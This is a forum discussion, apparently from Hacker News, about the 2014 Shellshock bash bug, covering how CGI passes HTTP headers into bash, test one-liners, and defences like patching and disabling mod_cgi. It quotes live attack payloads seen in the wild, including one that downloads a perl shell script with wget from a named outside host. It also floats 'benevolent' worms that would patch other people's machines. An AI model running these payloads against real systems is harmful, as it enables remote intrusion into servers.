This is being actively exploited. We (CloudFlare) put in place WAF rules to block the exploit yesterday and I've been looking at the log files for the blocking to see what's going on. Have been seeing things like:
Yeah, that's certainly the case with a couple of them, and then there are ones like this that are trying to set up shells and report where they've been established:
Request of file: /cgi-sys/defaultwebpage.cgi
With wget downloading a perl script to launch a shell:
() { :;}; /bin/bash -c \x22/usr/bin/wget http://singlesaints.com/firefile/temp?h=example.com -O /tmp/a.pl\x22
That site is still up and serving right now if anyone wants to take a look.
CloudFlare is so amazing... Thanks for all your hard work. I have over a million blocked malicious attempts on my site which gets a huge amount of traffic (not shellshock, I mean in general).
Out of curiosity, have you considered enabling it temporarily for everyone with Shellshock rules enabled? Just a day or two, to give people time to fix this. Is it feasible with your infrastructure/the way WAF works (I never used one)?
It could do a lot of good for people and be a great PR move at the same time.
Consider that the bug can be used as an amplification attack and you have a lot of webservers behind the free plan. I'm guessing you don't want to have Cloudflare's infrastructure be the IPs that everyone is blocking because some yoyo is using this to turn those machines into DDOS slaves. Might help your case internally.
Sad. This situation feels kind of a disaster-relief thing; not a good time to think about monetizing it. Still, I do understand you don't want people thinking you'll always be protecting them from everything even if they don't pay.
EDIT2 after clarification downthread, previous edit is to be disregarded.
It's less about trying to monetize it than about the cost to us of suddenly inspecting every request that goes through us. We service a huge volume of traffic, and part of our core value is performance, so keeping our processing latency as low as possible is important.
(Note: I removed sentence about CloudFlare pricing from previous comment to avoid any confusion about monetization)
No new monetization was put in place for this; the ability to add these rules has always been there (as a paid feature).
If this is a disaster-relief type thing, CloudFlare should then be eligible to receive government money later. I doubt that would even be considered by any of the parties.
Paying customers get protection automatically while free customers do not?
I think this is not something which should be treated as a "value-added service" for your paying customers. The health and security of the Internet is far too important.
All your customers should be protected automatically.
Read a bit about this because I didn't understand CGI. tl;dr version of what's going on here, if I'm not mistaken (assuming apache/php for this example):
1. Web server (apache) gets request to route to CGI script (PHP)
2. Per the CGI spec, apache passes the request body to PHP as stdin & sets the HTTP headers as environment variables, so PHP can access them
3. In the PHP script, `exec`/`passthru`/`shell_exec` etc. is called to do something in the shell/on the system level. This spawns a new shell (which may be bash)
4. bash interprets the environment variables set by apache
The rub lies in step 4: when bash interprets an environment variable called `HTTP_USER_AGENT` containing the value `() { :;}; /bin/ping -c 1 198.x.x.x` it "gets confused" & interprets that first part (before the second semicolon) as a function, then executes the second part as well
Hopefully this answers the "how does the exploit get from the browser to bash?"
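The whole chain can be reproduced in a few lines of shell, with no web server involved at all (the header name and payload here are made up for illustration):

```shell
# Step 2, by hand: put an attacker-shaped value into the environment,
# exactly as a CGI server would for a "User-Agent:" header.
export HTTP_USER_AGENT='() { :;}; echo INJECTED'

# Steps 3-4: spawn a child bash, which inherits that environment.
bash -c 'echo handling request'

# A patched bash prints only "handling request"; an unpatched one also
# executes the trailing command and prints "INJECTED" first.
```

The point being: the command passed to the child bash is completely harmless; the damage comes purely from the inherited environment.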
Further question: "If I do not use exec/shell_exec/popen etc, am I still vulnerable (just by virtue of using mod_php)?" AFAICT No, but I am not really sure (I hope someone clears this up).
Can someone who understands CGI enlighten me why (oh why) everyone treats #4 as the main problem instead of #2 ?
I mean, looking at it from an outside perspective, I can interpret #4 as working as intended (attacker calls my shell with arbitrary parameters and, naturally, my shell does arbitrary things controlled by the attacker), and #2 as a total WTF: why is apache passing arbitrary input data into global-scoped environment variables (that is, ones affecting subsequent bash invocations), and can it stop doing it? If not, why is apache passing this data without any verification/sanitization/escaping, and can it stop doing it?
The fixes to the bash flaw seem like a band-aid - if some web service invokes other programs that somehow get called with attacker-defined environment variables, then it seems like a potential for future exploits on other targets than bash; many other things will change their behavior depending on the environment vars.
It's not setting arbitrary environment variables, it's setting specific ones. Bash is basically calling eval on the list of envvars without re-escaping the values.
The people who wrote the CGI spec didn't expect that to happen at startup.
csh and zsh don't do it, and I can't think of any reason why someone would want that.
CGI was always a kludge, and envvars weren't a great choice, but they were presumed to be safe for arbitrary data.
In your opinion, what is the difference between php blindly passing unsanitized user input onwards to bash, and apache blindly passing unsanitized user input onwards to php?
Furthermore, in the sample attacks the php scripts don't 'use' that user input in any way; bash gets them because, well, it shares the same environment and its variables. If you'd want a php script 'sanitizing' those variables then it would mean checking for any possible HTTP_ environment variables and explicitly altering them even if the script doesn't recognize them - which seems ridiculous as well.
Imagine a dev using eval() in PHP. The PHP interpreter creates a new environment, executes your (presumably sanitized) code, but also automatically calls eval on every global variable in your app.
That would be a huge bug in PHP, and it's the equivalent of what bash is doing.
1: Why does Bash "interpret" the environment variables' values? What is the expected result of setting a function definition as the value of an environment variable? In my worldview (which is clearly wrong) there is no reason for Bash to look at environment variables' values until they're evaluated.
2: This is probably beside the point, but since when is the empty string a valid function name? I can't get Bash to accept "() { :; }" (as opposed to "f() { :; }") as valid bash.
Basically, Bash interprets environment variables at start up as a means for you to pass functions into subshells. Whenever an environment variable's value starts with "() {", it is interpreted as a function, which is named according to the environment variable's name.
I guess even without the bug under discussion this feature is a theoretical security flaw. If you set your user agent to "() { ping your.domain.com; }", a function named HTTP_USER_AGENT, which pinged your.domain.com, would exist in any shell Apache spawned. It's not hard to imagine a buggy script accidentally executing it.
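The legitimate version of this feature is `export -f`, which lets a parent bash hand a function down to a child bash (a minimal sketch; the function name is arbitrary):

```shell
# Define a function and mark it for export to child shells.
greet() { echo "hello from an exported function"; }
export -f greet

# A child bash reconstructs greet from the environment and can call it,
# even though greet was never defined in the child's own script.
bash -c greet
```

Function export is bash-specific, which is why csh/zsh/dash are unaffected by this mechanism.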
As far as I can see, this is largely correct. But do realize:
- that environments are inherited by child processes.
- It's not just Web servers that might execute scripts (DHCP could also be vulnerable, SSH with command restrictions, many other things too).
That's the big shitstorm about this bug. It's very hard to determine when you're actually vulnerable. The safest thing to do is to upgrade bash everywhere. But wait! The patches they rolled out don't actually fix the issue all that well. So there's no easy one-stop guide you can follow to fix this. Everybody actually has to think about every single system that might potentially be vulnerable and come up with a good solution all by themselves.
I don't quite get it yet. Let's suppose someone sends a header like this: 'User-Agent:() { :; }; touch /tmp/shellshocked'
Then in my cgi script I do a harmless system('date') call. The file /tmp/shellshocked won't be created right? The file would have been created had I done for example a system('echo $HTTP_USER_AGENT') call. (That is, one needs to explicitly reference the environment variable that gets passed to bash). Is my understanding correct?
No, bash interprets as functions ALL environment variables that begin with '() {' on startup. If you have an unpatched bash it will also execute any trailing commands after the function definition. You don't need to manually reference any environment variables at all to be vulnerable. This is due to how the bash feature of exporting functions to subshells ("export -f") works.
This is not my understanding. My understanding is that because this mechanism is intended to pass functions down to the system() call, all environment variables are parsed up front in case they contain any. Because the vulnerability lies in the parsing, it doesn't matter whether you reference the variable in the subsequent shell process or not.
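This is exactly what the widely circulated one-line test demonstrates: the variable `x` is never referenced by the command, yet an unpatched bash runs the payload during startup parsing anyway:

```shell
# Canonical CVE-2014-6271 check: note the command never mentions $x.
env x='() { :;}; echo vulnerable' bash -c 'echo this is a test'
# Unpatched: prints "vulnerable" and then "this is a test".
# Patched:   prints only "this is a test".
```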
echo $0 -> bash
ls -l /bin/sh -> /bin/bash
GNU bash, version 3.1.17(2)-release
Apache/2.2.25
And I couldn't reproduce the vulnerability in a perl cgi script unless I had explicitly referenced an environment variable in the system() call like I posted above. I thought all versions were vulnerable.
If there is only one scalar argument, the argument is checked for shell metacharacters, and if there are any, the entire argument is passed to the system's command shell for parsing (this is "/bin/sh -c" on Unix platforms, but varies on other platforms). If there are no shell metacharacters in the argument, it is split into words and passed directly to "execvp", which is more efficient.
Passing a shell metacharacter to the system function does indeed trigger the vulnerability. Thanks; I didn't realize it wasn't calling the shell otherwise.
My understanding was that although regular CGI respawns the command interpreter every time the web server is queried, FastCGI reuses the same command interpreter and just updates the environment.
I have no sympathy really for people who use `system()`-style calls, or bash in their web servers. Bash is fairly obviously designed with complete disregard for security. I seriously doubt this is its last major flaw.
But anyway, is it really that common? I would have thought most CGI scripts are Python, Perl, PHP, etc. and don't use `system()` type calls. Right?
No, super wrong. Underneath the hood there are all kinds of things that go on and result in system() or similar calls. Think about every module in CPAN / PyPI / whatever. Any non-trivial Web app has a high likelihood of eventually, somehow, somewhere, causing a system() type call to fire off.
This is actually quite common and acceptable if you want to interact with a piece of software for which there is no library or api. One real world example is producing thumbnails from Word documents using Libre Office.
You don't have to do it explicitly either. In Perl, for instance, doing stuff like open($tgz, "|-", "gzip | tar -cvf /tmp/file.tgz"); is going to cause execution of /bin/sh behind the scenes. Assuming that /bin/sh is never called during processing of external requests is risky.
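A quick way to check what those behind-the-scenes `/bin/sh` invocations actually resolve to on a given box (paths assume a typical Linux layout):

```shell
# Where does /bin/sh really point?
ls -l /bin/sh

# Ask the shell itself: BASH_VERSION is only set if sh is bash in disguise.
/bin/sh -c 'echo "${BASH_VERSION:-not bash}"'
```

On Debian/Ubuntu the second line typically prints "not bash" (dash); on many Red Hat-family systems it prints a bash version string.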
Since the post is relatively non-technical, I'd like to underscore that there are substantial concerns with the original and the followup patch, because with or without it, the underlying bash code parser is still exposed to the Internet. Nobody has posted an RCE vector that would be universally bad for the patched version, but several people have already identified "hmm, that's unexpected" types of global side effects when attacker-controlled strings are parsed as functions by bash. More is likely to come.
As of today, based on our conversations on oss-security, there is a third, unofficial patch that takes a much saner approach of isolating exported functions in a distinct namespace:
Especially in high-value or high-risk scenarios, you may want to give it a try. And if you're interested in the reasons why the original patch is problematic, check out:
The idea of using bash to do anything with input coming from the internet is asking for trouble, really... It's just a flaw with how CGI works generally, and how PHP etc. encourage you to build webapps.
It's the same principle as SQL-injection attacks (and the flaw is there for the same reason! It's the obvious quick solution to just query mysql with "select * from users where username = " . PARAMS['username']...).
But this is far more dangerous -- injecting malicious SQL can reveal data, or break things. Injecting malicious bash commands can reconfigure your server to do whatever they like.
I've worked with sysadmins that insisted that CGI be disabled for exactly this reason. If we wanted a dynamic website we needed to use mod_perl or mod_php (it was back in the early 2000s, Rails/Django/nginx hadn't yet been invented). It wasn't a perfect solution - both of them still had plenty of security vulnerabilities - but it cut down the attack surface significantly.
Now I understand what all the security people who said "never use system(). Never, ever" meant.
The dangerous thing is that lots of things that look like a library call to the unwary developer actually call out to other processes (visible if you run strace). This vulnerability will not be limited to web servers, either, and there will likely be systems that escape or unescape parameters in ways that evade app firewall rules.
So trying to understand the issue here, is this actually a bash thing or a problem with the web server forwarding commands to bash? I don't understand why bash would be listening to network traffic on its own.
Not just web servers, but anything that calls system() or popen() is really calling the system shell, /bin/sh. On many systems, /bin/sh is really bash in sh compatibility mode. That means all those perl scripts, CGI scripts, even DHCP clients expose the vulnerability. Ubuntu runs dash as /bin/sh instead, and most BSDs run ash, so they're not as vulnerable.
Edit: also, if you have ssh access to a non-login account, like for git access, this could execute commands on the remote host as if you had a shell.
Would a python web server (gunicorn, wsgi) behind nginx be vulnerable to this kind of problem?
I'm just pondering all the python library code out there which relies on calls to subprocess.Popen() to get things done. It seems like dynamic scripting languages with a tendency to shell out to the system could be at risk of this or similar attacks.
No, because WSGI (the "i" is for "interface" here) does not use a shell to pass data. subprocess.Popen would only be a problem if it passes user-generated data as environment variables, and it doesn't do that by default. That's rarely needed, but you may want to review your code to be sure.
Actually I just tried on an app that runs on Gunicorn and does a Popen with shell=True, and it is vulnerable. A simple curl -A '() { :;}; touch /tmp/owned' did create the file on the server.
That was my first question as well. The behavior sounds like exactly the kind of magical weirdness you get with shells. Your question is asked and answered here: https://stackoverflow.com/questions/26022248/is-the-behavior... The answer given there is that the behavior is NOT a documented feature; it's a side-effect of how bash implements inherited functions.
I was also very confused about why a web server would need to store HTTP headers in environment variables. Why would a mature piece of software like Apache do something so hackish? The explanation turns out to be very simple: it's how CGI works. Headers are passed to the CGI script as environment variables. If you don't do it that way, you don't support CGI.
There's one thing that still confuses me, though: why would a CGI implementation use the shell to set environment variables? Why would you use a complex, idiosyncratic piece of software that comes in many different flavors instead of just using the C setenv function?
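For what it's worth, setting environment variables for a child process doesn't require a shell at all; `env(1)` (or `setenv`/`execve` in C) stores arbitrary data without interpreting any of it:

```shell
# printenv is not a shell: the value is stored and printed back verbatim,
# and nothing in it is parsed or executed along the way.
env HTTP_USER_AGENT='() { :;}; echo x' printenv HTTP_USER_AGENT
```

That's what web servers actually do when spawning CGI scripts; the danger only appears when some descendant of that process happens to be bash.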
So does that mean that running a bash script under cgi doesn't inherently expose you to the vulnerability, you're vulnerable only if the bash script called invokes a shell in a sub-process?
If you're running a bash script as a cgi script in your web server, you're already vulnerable in half a dozen ways. Nobody does that.
If you're running a php/perl/python/ruby script as a cgi script in your web server, and that script calls system() or some variant thereof (backticks in perl, os.system in python), then you're vulnerable to this.
Not many people do that, but those who do won't be running things you think of as web applications. They're going to be web control panels you installed and forgot about, or cheap home routers whose firmware nobody knows who made.
No, running a bash script through CGI is definitely dangerous. What's safe is if your CGI handler is a non-bash program like PHP that reads the environment variables itself and doesn't itself pass those environment variables on to bash.
> why would a CGI implementation use the shell to set environment variables?
This is exactly my question; that, and: if this is so, then isn't any script that uses mod_cgi (e.g., PHP, Perl, etc.) vulnerable? Yet there are multiple statements that only cgi scripts written in bash are vulnerable.
I haven't been able to resolve this apparent inconsistency in the description of how the bug works in the case of CGI, which may be a critical factor in understanding one's own vulnerability. What exactly is the order of execution here in the case of mod_cgi?
Those statements aren't correct. A ShellShock exploit has two steps:
1. Attacker somehow gets to set an environment variable. Since CGI converts HTTP headers to env vars (Host: -> HTTP_HOST, etc), a CGI-enabled server is an easy way to make this happen.
Step 1 on its own would be alarming but ultimately harmless--the variables may contain malicious values, but they can't be used to hurt you if you treat them as untrusted or don't even read them. But since this is *nix, those possibly malicious vars will be inherited by children spawned by the affected process.
If one of those children is Bash, then (regardless of the shell command):
2. When starting up, the Bash process will parse the currently defined environment for things that look like functions and import them. The "ShellShock" portion of this bug is that the parser will keep parsing past the function's closing brace, which means it runs whatever trailing code might be there. If that trailing code was set by an attacker with the expectation that you'd start a vulnerable Bash, you're owned.
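You can watch step 2's raw material go by: when bash exports a function, the serialized body, beginning with "() {", sits in the environment like any other variable (the exact variable name used for the encoding differs between bash versions, so this only greps for the telltale value prefix):

```shell
# Export a function, then dump the environment a child process would
# inherit; the function body travels as an ordinary env var value.
bash -c 'f() { :; }; export -f f; env' | grep '() {'
```

A freshly started bash scans for values shaped like this and re-parses them as functions, which is exactly where the over-eager parsing happens.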
So every time Bash is launched, for any reason, it spins through all of the environment variables and executes anything it finds as long as it's preceded by a fairly simple pattern?
To me, what seems disturbing isn't the extent of the vulnerability, but how long it took for someone to notice it. How many other "shallow" bugs like this one have been missed by the proverbial many eyes?
In principle it shouldn't execute anything, it's only supposed to parse functions. The problem is that it's such an obscure feature I bet almost no-one knew it existed, the many eyes didn't exist in this case.
Statement #2 is the simple expression of the issue that's necessary for understanding it, notably missing or obfuscated in all the other massive verbiage on the topic today.
There are a TON of servers out there running PHP through good ole CGI. I would imagine that some of those are running web apps that lots and lots of people use. Meaning you now have shell access to those machines.
Mining username/passwords is probably going to be pretty simple. I wonder how many of these machines have credit card numbers stored in the clear? I'd bet that there's a bank somewhere running in exactly that configuration.
This is "end of the world" mostly because of all the "things" (a la "Internet of things") like toasters, microwaves, refrigerators, etc. all have vulnerable bash versions.
It's a bash thing, or more specifically, the issue is that many (mostly old) web applications/web servers pass content from the user straight to bash as environment variables, not expecting this to cause any problems.
The latter. Some daemons, like CGI scripts will spawn a shell populated with environment variables from the client. With a vulnerable bash, commands in these get executed.
All HTTP servers invoking scripts over the Common Gateway Interface (CGI) put user-supplied input into environment variables as part of their invocation process, because that's what the CGI spec says to do. Many other daemons perform similar techniques to communicate with subprocesses that they spawn to do work. And when launching a new process, environment variables are (by default) copied from the parent process.
The CGI script itself is neither a daemon nor responsible for populating the environment (merely for invoking system()). Also, most HTTP servers try to go out of their way to avoid invoking shells and instead invoke CGI scripts directly, saving on overhead.
More broadly, if ANY process puts ANY client-supplied input into environment variables and subsequently that process or a subprocess happens to spawn a copy of bash by calling system(3), then you're in trouble.
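The inheritance is transitive, which is why "a subprocess of a subprocess eventually starts bash" is enough. A sketch (the variable name is made up):

```shell
# The tainted variable survives an intermediate non-bash process untouched;
# nothing here inspects or sanitizes it along the way.
export EVIL='() { :;}; echo INJECTED'
/bin/sh -c "env | grep '^EVIL='"

# It would only be parsed at the moment a bash finally starts, however
# many hops away from the original daemon that is.
/bin/sh -c 'bash -c "echo reached bash two hops from the daemon"'
```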
Unless I've missed something, could some benevolent person use the bug to cause remote systems to run something like "sudo apt-get update && sudo apt-get install bash", to patch the vulnerability automatically? (it makes lots of assumptions, but surely it's better to have some patched systems as a result.)
Certain worms include a patching step like this when they infect a machine to avoid losing control via re-infection.
For a high school science research course I did an epidemiological modeling study on how "good" reverse-worms might affect the spread of infection, they're a pretty interesting thought experiment. With something involving exponential growth like this, early movers have a significant advantage.
As far as I know, there hasn't been a successful reverse-worm that did not accidentally cause worse issues (flooding local networks with a high density set of boxes doing over-zealous scanning, or accidentally destroying boxes due to a slapdash narrowly tested script).
Reverse-worms can either wait around, detecting requests from infected-but-not-patched systems so they can re-infect and patch them, or just start scanning IP ranges themselves. The former feels somewhat less pernicious: "try to infect this computer and you will be patched, and help patch." But that relies on other worms not patching their zombies.
It may be possible to exploit the bug for "good" reasons like patching the bug, but the patches that are out now don't seem to properly plug the exploit, and as with any update there are plenty of considerations that could end up bricking the application.
Aside from the "it's not yours to fix" angle, you have to weigh the moral benefits of possibly patching the exploit, possibly crashing the application (I bet this is much more likely than a successful fix at this point), and wait-and-seeing whether the application owner patches the exploit on their own (along with the risk of a compromise in the mean time).
Edit: Of course there are a slew of legal issues with attempting this as well.
"could some benevolent person use the bug to cause remote systems to run something like "
That's not benevolent that's intrusion. Nobody has the right to take it upon themselves to determine what someone else should be doing in this case. I would imagine that an action like that would also clearly violate a law or two (I'm sure others more knowledgeable could cite the law).
At the risk of participating in a philosophical debate, I pose a classic counterexample:
You encounter a car parked on the side of the road in the middle of nowhere. Its windows are rolled down. Storm clouds are rumbling nearby and it's obviously about to rain. There's nobody around but you.
Do you also consider rolling up the windows to be intrusion?
Personally I'd feel an ethical obligation to help the stranger out by preventing damage to his/her property. However I can completely understand people leaving well-enough alone.
Law aside, I'm much more on the fence about people automatically scanning for and "fixing" vulnerabilities, however. On one hand, how do you know you're really helping? On the other, as someone who's maintained a server or two, I'd rather be solving problems caused by a well-intentioned whitehat than miss problems caused by ill-intentioned blackhats.
"Do you also consider rolling up the windows to be intrusion?"
Yes, definitely. Really no different than wanting someone to enter your house to close your windows. Now you might say, "well, what if it can be done from the outside, without entering?" That is a bit different.
Except for one thing. What if someone saw you doing that? What if the owner saw you doing that and didn't know why you were messing with their car? (I had this happen with a boat one time btw.) There is an immediate sense of shock because you don't know what is going on. And in that case who knows what will happen? Maybe they might start a fight or shoot you. That's not good for anyone. Maybe they have something valuable in the car that they think you are going after. Maybe they have serious mental problems.
Here's the point. It's one thing if you see a baby in a hot car and decide to take action. The benefit outweighs the risks. But it's another thing if you decide to roll up the windows to prevent someone's car from getting wet inside (in many cases covered by homeowners insurance with a low deductible, not that it matters). Different story. Make sense?
sudo requires a password to be entered by default, right? I would guess that for most setups this wouldn't be possible without some kind of privilege escalation as well (or if the webserver was running with root privileges).
You'd be surprised by the number of servers that don't ask for password when you try to use sudo. They just assume that the actual owner issued the command and go straight to issuing the command as root.
(Caveat: typically it has to be a certain user)
I'm ashamed to admit I used to think that was convenient. It makes systems infinitely more vulnerable in the event of an RCE bug.
Many systems still use passwordless sudo to permit certain users to run specific commands -- but now, if those commands are shell scripts run via bash, the users can execute arbitrary commands (this isn't an uncommon class of privilege escalation problem, though).
sudo can be set up lots of different ways -- including such that there's no password needed.
> its not like this is a logged in ssh session
That's not correct -- whatever user is executing your CGI scripts is the "logged-in" user in bash, right?
Obviously that user should be quite locked down, and should not be allowed to run sudo at all, let alone without a password... but there are so many amateur server admins out there that I imagine there are quite a few servers where this is a serious problem (with or without sudo access enabled for the executing user).
If you're running Apache on Linux/UNIX, and don't absolutely need CGI, it's straightforward to turn it off in Apache.
Put a "#" in front of
LoadModule cgi_module modules/mod_cgi.so
in /etc/httpd/conf/httpd.conf. This prevents the code that runs CGI scripts from even being loaded with Apache, and will totally disable all CGI scripts. Apache is willing to execute CGI scripts from far too many directories, and many Linux distros have some default CGI scripts lying around.
This will break CPanel, but not non-CGI admin tools such as Webmin. I can't say anything about PHP; we don't use it.
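After commenting the line out and restarting, you can confirm nothing CGI-related is still loaded (this assumes `apachectl` is on your path; on Debian-family systems the command is `apache2ctl`):

```shell
# List loaded modules and look for any cgi variant (mod_cgi, mod_cgid, ...).
apachectl -M 2>/dev/null | grep -i cgi || echo "no CGI modules loaded"
```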
People are out there probing. This is from an Apache server log today from a dedicated server I run.
The source is on "i3d.net", which is a hosting service in Rotterdam NL. So someone is running probes from something bigger than a desktop. I sent their support people a note.
For Mac OS X, until Apple releases a software update, I've applied the original CVE-2014-6271 (shellshock) patch and am going to apply the CVE-2014-7169 patch as well once it passes review. Repository and instructions to reproduce without trusting me are located here:
The problem is that some utilities rely heavily on bashisms such that they're unlikely to work with dash or other POSIX-compliant sh-replacements. As an Arch user, just off the top of my head, I can think of yaourt (AUR helper) and apparently the shell script for invoking gradle as both reliant on such behavior. The latter may not affect everyone, and after running into just those two samples today, I can only imagine what else may be affected.
The best workaround I could think of is to install dash, repoint the /bin/sh symlink at dash, and then chown/chmod bash so that only the specific users who need it can use it. This isn't perfect: a web service might run as a user whose group memberships still grant access to bash, or might rely on another application that itself requires specific bashisms in order to function.
This is why abandoning correctness for convenience can be dangerous.
A question worth asking: how long has this been exploited? If you have years of Apache logs, go back through them with "grep" and look for attempts to exploit this vulnerability. Report the earliest date on which you find a hit. Thanks.
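A rough first pass over the logs might look like this (the log path is an assumption, and the "() {" marker only catches the common payloads; attackers can vary the whitespace):

```shell
# Simulate with a fabricated log line; in practice you'd point the grep
# at your real access.log* files instead.
printf '203.0.113.9 - - [25/Sep/2014] "GET /cgi-bin/x" "() { :;}; /bin/ping evil"\n' \
    > /tmp/fake_access.log

# Count requests whose headers carry the function-definition marker.
grep -c '() {' /tmp/fake_access.log
```

Pair that with the timestamps of the matching lines to get the earliest hit.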
It would be really nice if log aggregation services (Splunk, Loggly, Papertrail, etc) would do this, notify affected customers, and publicly release anonymized information about it.
Things like that lower the risk: run everything as a low-privilege account (better, not even www-data but per-site), chroot()-ed, etc. and certain classes of attack will either fail or at least be easier to clean up.
The problem with all of this is that it assumes that you don't have privilege escalation vulnerabilities on the local system, which is often not the case unless non-trivial effort has gone into hardening the server – e.g. all of that privilege separation is a waste if someone sledgehammer-ed a chmod 777 into a script rather than setting the appropriate ownership and permissions or someone delayed a kernel update because they didn't want the downtime and “knew” that only trusted code ran on that system.
Apache user can probably write to /tmp, and from there the attacker can construct a way into the system (bindshell, reverse shell). He can then start reading your PHP config files (db passwords) or try to use other vulnerabilities to escalate his privileges.
It doesn't seem to have trouble writing to /tmp in a typical low-access scenario. Seems to me, anything can write to /tmp; the default mode on /tmp is 1777 (world-writable, with the sticky bit).
I had someone exploit my Pydio install a few months ago with a litecoin miner. He managed to drop and run it in /tmp. He probably couldn't write and execute to too many other places.
From the article, it sounds like the issue is not just with Apache but also ssh, DHCP and others. So I'd just assume you're still at risk regardless of your Apache user configuration. (in any case, it's safer to act as if)
I've just checked our few Apache 2 systems that are Internet facing. Some of the site configs did have the standard Ubuntu CGI stanzas in them. However, the `/usr/lib/cgi-bin` directories were empty.
All this has made me a bit nervous though. I certainly didn't change the system to use bash instead of dash.
The passwd file contains the login shell configured for that user. Operating in the context of a daemon for most sane applications, this configuration doesn't (or shouldn't?) matter unless the user logs in. [1]
For Apache, I believe /bin/sh (or the shell it points to) is what's at issue here. [2]
Unless the distro changes it, APR defines SHELL_PATH as a macro pointing to /bin/sh (note this isn't the SHELL environment variable of the same name; that would be a serious problem, since shellshock allows setting env variables by means that are very public by now).
In a system I have access to, the installation procedure for some servers (not webserver necessarily) includes creating users with a full environment to be able to issue commands for these servers at a higher privilege. At the creation of these users, Ubuntu Server assigned them bash as their shell. I wonder if they're attackable at their public ports, but I haven't bothered trying to find attacking vectors since they were in production and the sysadmin got rid of bash as soon as he could. Not giving much detail here since I assume there will be plenty of compromised servers in the wild right now, including DB servers, proxies, etc.
From my understanding, mod_php is not affected. However, if you have any system() calls in your PHP code AND you allow user input to be used in those system calls, then /bin/bash could be executed via the system call. If you control what is running in your system call - i.e.
system("echo 'hello world'");
then I believe you are OK. But that's "security 101" and you should never be opening a system call to user input.
I must not be understanding how this works then - how would /bin/bash be executed from a PHP system() call unless it was called directly from the command? And if you don't allow user input into the system call, how is /bin/bash going to be inserted into it? Thanks!
Yeah I get that - but surely just _calling_ /bin/bash isn't enough - you have to be able to pass in the arguments to bash that enable this exploit. And if you're not allowing user input into your system call, I still think this is a non issue in this scenario.
If php is being run from mod_cgi, then it is exploitable.
The full chain of the attack:
Request sent to the url, containing headers with '() { :;}; codehere'
Per CGI standard: environment variables are set with the attack code.
PHP is executed directly, with the environment containing the attack.
PHP calls system - the same environment is there, meaning the code is executed if /bin/sh points to bash.
N.B. - If /bin/sh is not bash, but the program executed by system() itself calls system() on something that explicitly invokes bash (apply this recursively), the exploit is still triggered.
It's not about passing "arguments" on the command line, it's about what the environment variables are. It's not always immediately obvious how the env vars are constructed - everyone points to CGI because it's a well-known scenario, but there are plenty of other cases where environment variables are set from user data.
tl; dr - in any situation user input is used in environment variables, simply calling /bin/bash is enough.
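A minimal, safe illustration of that tl;dr (the header-derived variable name here is hypothetical; a patched bash simply ignores the payload):

```shell
# The attack code lives in the *value* of an environment variable; the
# command line itself is innocuous. On an unpatched bash, "payload ran"
# would print before the real command even starts.
env HTTP_USER_AGENT='() { :;}; echo payload ran' bash -c 'echo normal request handling'
```

On a patched bash this prints only "normal request handling".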
Yeah - that would not be an issue for mod_php, since it is about DHCP. If your server gets its IP from DHCP, then there's a potential issue, but since we're talking about mod_php here (not running PHP as a CGI, just mod_php), the linked post is not related.
This is a super fringe case and wouldn't warrant this big of a deal. For this to be a 10/10 issue, it has to mean that processing the header files in Nginx/Apache results in some buffer overflow or for those values to be directly fed to bash.
Otherwise the risk is super minimal, so I don't think it's a matter of making system/exec calls on user-supplied data.
No, you fundamentally and dangerously misunderstand the bug.
Your "exec($SomeVar)" example is a standard, unsanitized-input-passed-to-command-line type bug.
Shellshock does something fundamentally different. Everything on the actual command line is irrelevant to shellshock.
What happens is that the child Bash inherits env vars from the parent (which is often the web server). The shellshock bug is that the ENV VARS THEMSELVES are evaluated by bash as instructions.
Your actual PHP or whatever can be fully up to best-practices, sanitizing cookies and inputs, etc., and still fall vulnerable if one of the server-set environment variables like HTTP_ACCEPT_LANGUAGE has a malicious payload and ANYWHERE in your code, a subsequent system() call deep within some imported module gets fired off.
I'm sorry, my lack of understanding was supposed to be apparent in that post, and indeed you clarified that it's actually more the second scenario I hinted at. I was responding to people talking specifically about an underlying language making system calls, and the claim that not making such system calls from the language itself would keep you safe.
You're confirming the suspicion that I had. To wit:
"for this to be a 10/10 issue, it has to mean that processing the header files in Nginx/Apache results in some buffer overflow or for those values to be directly fed to bash."
Not a buffer overflow, but if those headers are being fed upwards into bash, that's what we're both talking about.
Don't forget to update any Docker instances of OS's. My brother just challenged me and I'd assumed my Docker Ubuntu instances would be updated automatically by updating the main Ubuntu OS but that was not the case. In my defense I'm still new to Docker.
I also used this to list my containers:
docker ps -la -n=100
And removed them all, then listed images:
docker images
And removed them and then ran this to get the latest ubuntu installed from docker:
The new docker image of ubuntu is still vulnerable.
Edit: Updating the container then committing it (Docker terminology) should ensure that container stays updated, though any new runs creating new containers would continue to be vulnerable I suspect until Docker patches them or whomever would be responsible to do so.
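For anyone re-checking their images, one sketch (the `ubuntu` image name follows the parent comment; the final line runs the same probe against the host's bash, so it is safe to try without docker):

```shell
# With docker available, probe the image itself rather than trusting the tag:
#   docker pull ubuntu
#   docker run --rm ubuntu env x='() { :;}; echo vulnerable' bash -c 'echo clean'
# A vulnerable image prints "vulnerable" before "clean"; a patched one prints only "clean".
env x='() { :;}; echo vulnerable' bash -c 'echo clean'
```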
Does anybody have concrete steps for what to do as a sysadmin? Do I only need to install the newest bash (on Linux systems), or do I also need to restart daemons like nginx/Apache?
The vulnerability only affects bash when it is parsing environment variables, when it is just starting. So if a process is already running, it's not vulnerable and you don't have to restart it. You should definitely apply the patch from Wednesday, but be aware there is a related vulnerability that has no patch yet.
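As a concrete sketch of those steps (the package-manager line assumes Debian/Ubuntu; Red Hat derivatives would use `yum update bash` instead):

```shell
# Harmless check of which bash build is currently installed:
bash --version | head -n 1
# Then upgrade just bash via the package manager, e.g. on Debian/Ubuntu:
#   sudo apt-get update && sudo apt-get install --only-upgrade bash
# Per the comment above, no daemon restarts are needed for this fix.
```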
If you get "busted" back, then you're affected... which is what I get with Mac OS X 10.9... However, when I try it on an Ubuntu server (14.x) that hasn't been patched in a while, I don't get the error. Er, why is that? I thought this pretty much affected every bash from the last 25 years?
(Someone else in this thread mentioned that Ubuntu uses dash...so...all modern Ubuntu servers are OK?)
No, you are not OK. Replace "sh" in that command with "bash" and you should still see the issue.
There is a lower likelihood that you'll see the issue, as anything which just uses sh (including the "system" function and similar ones) will use dash instead of bash; but there will still be places where bash is called explicitly, including many shell scripts that depend on bash features, which are vulnerable.
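Assuming the test being discussed is the widely circulated one, this is how to probe both shells (a vulnerable shell prints "busted" before the probe text):

```shell
# Probe whatever /bin/sh is (dash on Ubuntu, bash on Red Hat):
env x='() { :;}; echo busted' sh -c 'echo probe'
# Probe bash explicitly, which is the case described above:
env x='() { :;}; echo busted' bash -c 'echo probe'
```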
The attack isn't against terminal shells. The biggest risk is against things that use the shell implicitly like system()/popen()/etc and they all use /bin/sh
